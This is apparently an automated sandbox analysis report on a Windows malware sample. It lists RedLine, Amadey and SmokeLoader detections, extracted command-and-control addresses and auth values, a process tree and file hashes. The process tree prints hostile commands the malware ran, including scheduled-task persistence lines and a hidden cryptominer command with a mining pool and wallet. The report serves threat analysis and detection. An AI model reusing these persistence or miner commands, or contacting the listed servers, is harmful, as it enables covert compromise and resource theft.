Analysis
-
max time kernel
130s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
31-10-2022 20:18
Static task
static1
Behavioral task
behavioral1
Sample
f14a6a9dab709deb02cd549fd88514dd84d454d254ec174bad834265f126ee39.exe
Resource
win10v2004-20220901-en
General
-
Target
f14a6a9dab709deb02cd549fd88514dd84d454d254ec174bad834265f126ee39.exe
-
Size
210KB
-
MD5
710a7926da9ff95dd8c78e5e19387d8f
-
SHA1
cdc855c14fd60fc52524d7288921b31c22b7c67d
-
SHA256
f14a6a9dab709deb02cd549fd88514dd84d454d254ec174bad834265f126ee39
-
SHA512
06a0f37324d6921324732c06c34663110f72ffbec881dc247f7b21bd07c7bf5c0e359925ff074937a25326f8452ed5f427814e5ab540d16d2a79070f08951ee9
-
SSDEEP
3072:I7tMw36RdY+40CLajvq6sf54rWwzPafB6V+04md3/Btx:I7qRR6+4dLajvqGlzPPLTd3/Bt
Malware Config
Extracted
redline
slovarik15btc
78.153.144.3:2510
-
auth_value
bfedad55292538ad3edd07ac95ad8952
Extracted
redline
31.10
194.87.218.5:9630
-
auth_value
6223ceba7350b5fdfd29a51c01ad5fdb
Extracted
redline
Google2
167.235.71.14:20469
-
auth_value
fb274d9691235ba015830da570a13578
Signatures
-
Detect Amadey credential stealer module 2 IoCs
resource yara_rule behavioral1/files/0x001700000001f01a-272.dat amadey_cred_module behavioral1/files/0x001700000001f01a-273.dat amadey_cred_module -
Detects Smokeloader packer 1 IoCs
resource yara_rule behavioral1/memory/3248-133-0x00000000006F0000-0x00000000006F9000-memory.dmp family_smokeloader -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
resource yara_rule behavioral1/memory/2276-149-0x0000000000F50000-0x0000000000F78000-memory.dmp family_redline behavioral1/memory/3920-209-0x0000000000940000-0x0000000000968000-memory.dmp family_redline behavioral1/memory/2260-239-0x0000000000F90000-0x0000000000FB8000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 51 4820 rundll32.exe -
Downloads MZ/PE file
-
Executes dropped EXE 11 IoCs
pid Process 2964 5F95.exe 2372 65C0.exe 5088 rovwer.exe 4520 7716.exe 2112 7DFD.exe 4556 8409.exe 1568 sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe 1644 LYKAA.exe 5028 9C16.exe 672 rovwer.exe 3084 urwfjte -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 65C0.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation rovwer.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 8409.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation LYKAA.exe -
Loads dropped DLL 4 IoCs
pid Process 2072 InstallUtil.exe 2072 InstallUtil.exe 2072 InstallUtil.exe 4820 rundll32.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2964 set thread context of 2276 2964 5F95.exe 96 PID 4520 set thread context of 2072 4520 7716.exe 103 PID 5028 set thread context of 3920 5028 9C16.exe 115 PID 2112 set thread context of 2260 2112 7DFD.exe 122 PID 1644 set thread context of 2476 1644 LYKAA.exe 125 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 540 2372 WerFault.exe 91 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f14a6a9dab709deb02cd549fd88514dd84d454d254ec174bad834265f126ee39.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f14a6a9dab709deb02cd549fd88514dd84d454d254ec174bad834265f126ee39.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f14a6a9dab709deb02cd549fd88514dd84d454d254ec174bad834265f126ee39.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5068 schtasks.exe 2240 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3368 timeout.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3248 f14a6a9dab709deb02cd549fd88514dd84d454d254ec174bad834265f126ee39.exe 3248 f14a6a9dab709deb02cd549fd88514dd84d454d254ec174bad834265f126ee39.exe 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2440 Process not Found -
Suspicious behavior: MapViewOfSection 19 IoCs
pid Process 3248 f14a6a9dab709deb02cd549fd88514dd84d454d254ec174bad834265f126ee39.exe 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found 2440 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeDebugPrivilege 1568 sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe Token: SeDebugPrivilege 1644 LYKAA.exe Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeDebugPrivilege 2276 vbc.exe Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found Token: SeCreatePagefilePrivilege 2440 Process not Found Token: SeShutdownPrivilege 2440 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2440 wrote to memory of 2964 2440 Process not Found 89 PID 2440 wrote to memory of 2964 2440 Process not Found 89 PID 2440 wrote to memory of 2964 2440 Process not Found 89 PID 2440 wrote to memory of 2372 2440 Process not Found 91 PID 2440 wrote to memory of 2372 2440 Process not Found 91 PID 2440 wrote to memory of 2372 2440 Process not Found 91 PID 2372 wrote to memory of 5088 2372 65C0.exe 93 PID 2372 wrote to memory of 5088 2372 65C0.exe 93 PID 2372 wrote to memory of 5088 2372 65C0.exe 93 PID 2964 wrote to memory of 2276 2964 5F95.exe 96 PID 2964 wrote to memory of 2276 2964 5F95.exe 96 PID 2964 wrote to memory of 2276 2964 5F95.exe 96 PID 2964 wrote to memory of 2276 2964 5F95.exe 96 PID 2964 wrote to memory of 2276 2964 5F95.exe 96 PID 2440 wrote to memory of 4520 2440 Process not Found 97 PID 2440 wrote to memory of 4520 2440 Process not Found 97 PID 2440 wrote to memory of 4520 2440 Process not Found 97 PID 5088 wrote to memory of 2240 5088 rovwer.exe 98 PID 5088 wrote to memory of 2240 5088 rovwer.exe 98 PID 5088 wrote to memory of 2240 5088 rovwer.exe 98 PID 2440 wrote to memory of 2112 2440 Process not Found 100 PID 2440 wrote to memory of 2112 2440 Process not Found 100 PID 2440 wrote to memory of 2112 2440 Process not Found 100 PID 2440 wrote to memory of 4556 2440 Process not Found 102 PID 2440 wrote to memory of 4556 2440 Process not Found 102 PID 4520 wrote to memory of 2072 4520 7716.exe 103 PID 4520 wrote to memory of 2072 4520 7716.exe 103 PID 4520 wrote to memory of 2072 4520 7716.exe 103 PID 4520 wrote to memory of 2072 4520 7716.exe 103 PID 4520 wrote to memory of 2072 4520 7716.exe 103 PID 4520 wrote to memory of 2072 4520 7716.exe 103 PID 4520 wrote to memory of 2072 4520 7716.exe 103 PID 4520 wrote to memory of 2072 4520 7716.exe 103 PID 4556 wrote to memory of 1568 4556 8409.exe 104 PID 4556 wrote to memory of 1568 4556 8409.exe 104 PID 1568 wrote to memory of 3988 1568 sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe 105 PID 1568 wrote to memory of 3988 1568 sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe 105 PID 3988 wrote to memory of 3368 3988 cmd.exe 107 PID 3988 wrote to memory of 3368 3988 cmd.exe 107 PID 3988 wrote to memory of 1644 3988 cmd.exe 108 PID 3988 wrote to memory of 1644 3988 cmd.exe 108 PID 1644 wrote to memory of 5032 1644 LYKAA.exe 109 PID 1644 wrote to memory of 5032 1644 LYKAA.exe 109 PID 5032 wrote to memory of 5068 5032 cmd.exe 111 PID 5032 wrote to memory of 5068 5032 cmd.exe 111 PID 2440 wrote to memory of 5028 2440 Process not Found 112 PID 2440 wrote to memory of 5028 2440 Process not Found 112 PID 2440 wrote to memory of 5028 2440 Process not Found 112 PID 2440 wrote to memory of 3000 2440 Process not Found 114 PID 2440 wrote to memory of 3000 2440 Process not Found 114 PID 2440 wrote to memory of 3000 2440 Process not Found 114 PID 2440 wrote to memory of 3000 2440 Process not Found 114 PID 5028 wrote to memory of 3920 5028 9C16.exe 115 PID 5028 wrote to memory of 3920 5028 9C16.exe 115 PID 5028 wrote to memory of 3920 5028 9C16.exe 115 PID 5028 wrote to memory of 3920 5028 9C16.exe 115 PID 5028 wrote to memory of 3920 5028 9C16.exe 115 PID 2440 wrote to memory of 4104 2440 Process not Found 116 PID 2440 wrote to memory of 4104 2440 Process not Found 116 PID 2440 wrote to memory of 4104 2440 Process not Found 116 PID 2440 wrote to memory of 396 2440 Process not Found 117 PID 2440 wrote to memory of 396 2440 Process not Found 117 PID 2440 wrote to memory of 396 2440 Process not Found 117 PID 2440 wrote to memory of 396 2440 Process not Found 117 -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f14a6a9dab709deb02cd549fd88514dd84d454d254ec174bad834265f126ee39.exe"C:\Users\Admin\AppData\Local\Temp\f14a6a9dab709deb02cd549fd88514dd84d454d254ec174bad834265f126ee39.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3248
-
C:\Users\Admin\AppData\Local\Temp\5F95.exeC:\Users\Admin\AppData\Local\Temp\5F95.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Users\Admin\AppData\Local\Temp\65C0.exeC:\Users\Admin\AppData\Local\Temp\65C0.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe"C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe" /F3⤵
- Creates scheduled task(s)
PID:2240
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\80b59841e5c623\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- outlook_win_path
PID:4820
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 11362⤵
- Program crash
PID:540
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2372 -ip 23721⤵PID:1820
-
C:\Users\Admin\AppData\Local\Temp\7716.exeC:\Users\Admin\AppData\Local\Temp\7716.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe2⤵
- Loads dropped DLL
PID:2072
-
-
C:\Users\Admin\AppData\Local\Temp\7DFD.exeC:\Users\Admin\AppData\Local\Temp\7DFD.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2112 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵PID:2260
-
-
C:\Users\Admin\AppData\Local\Temp\8409.exeC:\Users\Admin\AppData\Local\Temp\8409.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Users\Admin\AppData\Roaming\sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe"C:\Users\Admin\AppData\Roaming\sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp89A2.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:3368
-
-
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"6⤵
- Creates scheduled task(s)
PID:5068
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.installs001 -p x -t 65⤵PID:2476
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:3176
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9C16.exeC:\Users\Admin\AppData\Local\Temp\9C16.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵PID:3920
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3000
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4104
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:396
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4072
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1748
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4496
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2860
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1584
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:548
-
C:\Users\Admin\AppData\Roaming\urwfjteC:\Users\Admin\AppData\Roaming\urwfjte1⤵
- Executes dropped EXE
PID:3084
-
C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exeC:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe1⤵
- Executes dropped EXE
PID:672
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
837KB
MD59796f845b710c1e68ee9f93592503665
SHA19be7d53dfa928f3a4ff37146a0ec1ef9a62c3c51
SHA2562c0d646f8dbe3bc19c6d85ba819af553d68a1d4ce61a3e9f843566d35f240d8f
SHA512c5f0f2fba732f9ba484e0ee0d672f488c1f7c454f1b549e348dea86f96e5bc706e8e634bb1cdab3f52d16af9ac8bb29505bf5905d47386b04a5905dc6b5e5135
-
Filesize
837KB
MD59796f845b710c1e68ee9f93592503665
SHA19be7d53dfa928f3a4ff37146a0ec1ef9a62c3c51
SHA2562c0d646f8dbe3bc19c6d85ba819af553d68a1d4ce61a3e9f843566d35f240d8f
SHA512c5f0f2fba732f9ba484e0ee0d672f488c1f7c454f1b549e348dea86f96e5bc706e8e634bb1cdab3f52d16af9ac8bb29505bf5905d47386b04a5905dc6b5e5135
-
Filesize
612KB
MD5f07d9977430e762b563eaadc2b94bbfa
SHA1da0a05b2b8d269fb73558dfcf0ed5c167f6d3877
SHA2564191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862
SHA5126afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf
-
Filesize
1.9MB
MD5f67d08e8c02574cbc2f1122c53bfb976
SHA16522992957e7e4d074947cad63189f308a80fcf2
SHA256c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e
SHA5122e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5
-
Filesize
1.0MB
MD5dbf4f8dcefb8056dc6bae4b67ff810ce
SHA1bbac1dd8a07c6069415c04b62747d794736d0689
SHA25647b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68
SHA512b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1
-
Filesize
2KB
MD51f5b2fb087be05026a47d87b0471c411
SHA19f012480d0402c7200ff48576daaf6adf63125cc
SHA2563a12e1bfa36873489b21ac589cb27792a417eb2e55f4622c53c224934ff05527
SHA512003aeb76f6e1be9b201f7ba83d27609e59433596b3dab7afe15790b422cc9cd8a10ea5e36d96dea0cf01a86928dedd1d06d42489e9ae60c460f55aa93d9f5c51
-
Filesize
366KB
MD59bf62799fd46f2aa9c763fcc0002766f
SHA13fdea89b23c859712c920e82fbb1cd0e030b5481
SHA256195f5974f6237399d1cab32a24dea4fad911a0b3fb9e5ac3e48de6d136cc98b1
SHA5126d6b43373f34b05d8ebcdf0dcde1fb1bb4c96509a6f8322ad2454c0e047fc7cbbcc575b927793a2d3f4aad02a1be7bf8a304b1586b29c2fbaafa366895f33dac
-
Filesize
366KB
MD59bf62799fd46f2aa9c763fcc0002766f
SHA13fdea89b23c859712c920e82fbb1cd0e030b5481
SHA256195f5974f6237399d1cab32a24dea4fad911a0b3fb9e5ac3e48de6d136cc98b1
SHA5126d6b43373f34b05d8ebcdf0dcde1fb1bb4c96509a6f8322ad2454c0e047fc7cbbcc575b927793a2d3f4aad02a1be7bf8a304b1586b29c2fbaafa366895f33dac
-
Filesize
269KB
MD57a243e72e93b1fc13ed2bfa8cbb76b15
SHA1eb026a5f5b25f63a821eb9e40e06ccea547c1215
SHA25632af50f6116406a949220efdc2859519190c4f7496ef1dccba03bcd2df4724fb
SHA512221ee37dac594dafe273a858dd176849e52458c50a1064e3b3a949bf0763544ebbffbda584594e2428b597390c4bd91fefdc9d5e77ebf360b86b489581c63c39
-
Filesize
269KB
MD57a243e72e93b1fc13ed2bfa8cbb76b15
SHA1eb026a5f5b25f63a821eb9e40e06ccea547c1215
SHA25632af50f6116406a949220efdc2859519190c4f7496ef1dccba03bcd2df4724fb
SHA512221ee37dac594dafe273a858dd176849e52458c50a1064e3b3a949bf0763544ebbffbda584594e2428b597390c4bd91fefdc9d5e77ebf360b86b489581c63c39
-
Filesize
1.2MB
MD5b67545f8f9bcc95c2efca01d65d4c429
SHA1062c213d68a70dfdaef4bc9828fbfd8ec0e0dbaf
SHA2565c5b2716906f6be939574770f2ce1822dd3d4874dc1924a82096bccc377afde4
SHA5124ca32731de173cc6a71f5b76ec94b98d340e3186f52719bdc7ed79849c5b2c4d5b2952c33e20716ce9af35d50d0e962521904a4a8d977e182dc3aabfdfa3d563
-
Filesize
1.2MB
MD5b67545f8f9bcc95c2efca01d65d4c429
SHA1062c213d68a70dfdaef4bc9828fbfd8ec0e0dbaf
SHA2565c5b2716906f6be939574770f2ce1822dd3d4874dc1924a82096bccc377afde4
SHA5124ca32731de173cc6a71f5b76ec94b98d340e3186f52719bdc7ed79849c5b2c4d5b2952c33e20716ce9af35d50d0e962521904a4a8d977e182dc3aabfdfa3d563
-
Filesize
366KB
MD5d5fc492ae5bccfd2ff1b17267a02ba6d
SHA14d6531bc0bdec8bb5f40c8173c6218d8df295166
SHA256a33133d206745cb5c59f577a858a23181904f7c5f0cb9f0fd4692e16d171c5f8
SHA5126ef85c305f9003426846e8d0a031a59d35ed7fa3c12a95cef031ac1e1826fe0991a62ec8860b1b4dcd259a9fff2ac91de2a92ea8087db8a13a0464461bbac9bc
-
Filesize
366KB
MD5d5fc492ae5bccfd2ff1b17267a02ba6d
SHA14d6531bc0bdec8bb5f40c8173c6218d8df295166
SHA256a33133d206745cb5c59f577a858a23181904f7c5f0cb9f0fd4692e16d171c5f8
SHA5126ef85c305f9003426846e8d0a031a59d35ed7fa3c12a95cef031ac1e1826fe0991a62ec8860b1b4dcd259a9fff2ac91de2a92ea8087db8a13a0464461bbac9bc
-
Filesize
1.1MB
MD53cbeec829f400bbc837e6cedf044a6cb
SHA1b6906942e53a1482069c123ca7f127cdf50c25fc
SHA256f2ba48f9b1da2b3971f2e70b772a4d6fc503eb4b890fca1923b322687b77dd9f
SHA512285f08009934e530ef37b1c98097e7ab1134943e0796fbc0413883e367110aa1d4f14f5ed242b9386d8677e2cbc3000bbe3ccea5ac27b0aa72128425c8106806
-
Filesize
1.1MB
MD53cbeec829f400bbc837e6cedf044a6cb
SHA1b6906942e53a1482069c123ca7f127cdf50c25fc
SHA256f2ba48f9b1da2b3971f2e70b772a4d6fc503eb4b890fca1923b322687b77dd9f
SHA512285f08009934e530ef37b1c98097e7ab1134943e0796fbc0413883e367110aa1d4f14f5ed242b9386d8677e2cbc3000bbe3ccea5ac27b0aa72128425c8106806
-
Filesize
2.4MB
MD5aa69c686079261b69dc17e66285d5b6b
SHA16809398e2baa190a25002e18fb2fd285c2ca45b1
SHA256bbad8c3c40b0b39517e44a54d8644bcb14681f128d73eab598495c8e3737ad22
SHA51283361a8512c65521b640fc01a9c8801e2498a3a8e1a272adca5f64536dd64101dd47dc4aecd30a83e36b6a6a882f841eec6a66338ce1f29a8b4729f1e33eef2d
-
Filesize
2.4MB
MD5aa69c686079261b69dc17e66285d5b6b
SHA16809398e2baa190a25002e18fb2fd285c2ca45b1
SHA256bbad8c3c40b0b39517e44a54d8644bcb14681f128d73eab598495c8e3737ad22
SHA51283361a8512c65521b640fc01a9c8801e2498a3a8e1a272adca5f64536dd64101dd47dc4aecd30a83e36b6a6a882f841eec6a66338ce1f29a8b4729f1e33eef2d
-
Filesize
269KB
MD57a243e72e93b1fc13ed2bfa8cbb76b15
SHA1eb026a5f5b25f63a821eb9e40e06ccea547c1215
SHA25632af50f6116406a949220efdc2859519190c4f7496ef1dccba03bcd2df4724fb
SHA512221ee37dac594dafe273a858dd176849e52458c50a1064e3b3a949bf0763544ebbffbda584594e2428b597390c4bd91fefdc9d5e77ebf360b86b489581c63c39
-
Filesize
269KB
MD57a243e72e93b1fc13ed2bfa8cbb76b15
SHA1eb026a5f5b25f63a821eb9e40e06ccea547c1215
SHA25632af50f6116406a949220efdc2859519190c4f7496ef1dccba03bcd2df4724fb
SHA512221ee37dac594dafe273a858dd176849e52458c50a1064e3b3a949bf0763544ebbffbda584594e2428b597390c4bd91fefdc9d5e77ebf360b86b489581c63c39
-
Filesize
269KB
MD57a243e72e93b1fc13ed2bfa8cbb76b15
SHA1eb026a5f5b25f63a821eb9e40e06ccea547c1215
SHA25632af50f6116406a949220efdc2859519190c4f7496ef1dccba03bcd2df4724fb
SHA512221ee37dac594dafe273a858dd176849e52458c50a1064e3b3a949bf0763544ebbffbda584594e2428b597390c4bd91fefdc9d5e77ebf360b86b489581c63c39
-
